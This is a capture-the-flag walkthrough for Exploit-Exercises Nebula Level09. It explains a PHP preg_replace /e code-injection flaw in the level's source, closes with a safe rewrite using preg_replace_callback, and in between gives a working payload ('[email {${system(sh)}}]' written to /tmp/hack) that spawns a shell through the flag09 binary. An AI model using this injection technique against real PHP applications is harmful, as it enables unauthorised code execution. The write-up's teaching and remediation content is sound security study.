How to pwn Nebula: Level09 - PHP preg_replace

# Exploit-Exercises: Nebula

## Level09 - PHP preg_replace

Hi everyone! It's been a long time since the last tutorial :slight_smile: Today, this tutorial will focus on a vulnerable PHP application.

Let's begin!

### The source code

Nebula provides us with the PHP source code of the vulnerable app:

```php
<?php

// Obfuscate an e-mail address so it cannot be harvested as-is.
function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

// Read a file and turn [email ...] tags into obfuscated addresses.
function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  // The /e modifier evaluates the replacement as PHP code (see below).
  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>
```

Let's break the code into small pieces.

N.B.: the flag09 binary located in /home/flag09 will run the PHP script.

### Understanding preg_replace and PHP variables

How does it work? There are two functions in this PHP code: spam and markup.

Here is the spam function:

```php
function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}
```

This function simply rewrites the content of the $email variable:

if the regex finds a ".", the function replaces it with " dot "
if the regex finds an "@", the function replaces it with " AT "

Example: darlene@fsociety.com will output: darlene AT fsociety dot com

Now let's dive into the markup function:

```php
function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}
```

The markup function has two arguments: $filename and $use_me.

Forget the $use_me variable: we will pass garbage data (e.g. asdf, fsociety, unicorn) because this variable is never used.

$filename is the path to our file :slight_smile: As you can see in the first regex, the function searches for a specific pattern:

`[email (.*)]`

If a line of the file matches that pattern, for example `[email darlene@fsociety.com]`, the whole `[email ...]` tag is stripped and the second capture group is passed to spam: `spam("darlene@fsociety.com")`.

The spam function then rewrites these addresses, e.g.:

  • darlene AT fsociety dot com
  • eliot AT fsociety dot com
  • tyrell AT e-corp dot com
  • gideon AT allsafe dot com

### Exploiting preg_replace

Here is the problem with this piece of code:

```php
  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
```

The /e modifier (PREG_REPLACE_EVAL) makes preg_replace evaluate the replacement string as a PHP expression after substituting the backreferences. Whatever the capture group contains is therefore pasted into a double-quoted PHP string that is then executed, so variable interpolation such as `{$var}` or `${expr}` in the input file is processed as code. This modifier was deprecated in PHP 5.5 and removed in PHP 7.0; the supported replacement is preg_replace_callback, which receives the match as a plain string.

Let's create our "hack file":

```sh
echo '[email {$filename}]' >/tmp/hack
```

Now when we run the flag09 binary on it, the output will be:

```
/tmp/hack
```

The `{$filename}` from our file was interpolated as a PHP variable inside the replacement string. Now let's exploit it to get a shell:

```sh
echo '[email {${system(sh)}}]' >/tmp/hack
```

PHP evaluates the `${...}` expression while building the string, which calls system() and gives us a shell :slight_smile:
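As an added example (not part of the original write-up or of Nebula's code), here is the same markup function rewritten without /e, using preg_replace_callback so the captured text is handed to spam() as data and never pasted into PHP source; the input strings are constructed for the demonstration.

```php
<?php
// Added example, not Nebula's code: the level's markup() without the
// /e modifier. preg_replace_callback passes the match array to a closure,
// so "{$filename}" or "${...}" inside the input stays inert text.

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup_safe($contents)
{
    // Original (vulnerable, PHP 5 only):
    //   preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    // With /e the replacement was evaluated as PHP after \\2 was
    // substituted, so file content controlled the source of a string.
    $contents = preg_replace_callback(
        "/(\[email (.*)\])/",
        function ($m) { return spam($m[2]); },   // $m[2] is a string, never code
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

// Constructed sample input: a benign address plus the probe line from the
// write-up. Single quotes keep {$filename} literal in our own source.
$input = "[email darlene@fsociety.com]\n" . '[email {$filename}]' . "\n";
$filename = "/tmp/hack";   // would have been interpolated under /e

print markup_safe($input);
```

The first input line still comes out as "darlene AT fsociety dot com", while the second is printed as the literal text {$filename} instead of /tmp/hack, because the callback version never re-parses the captured text.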

The next tutorial will cover Race Condition exploit :slight_smile:
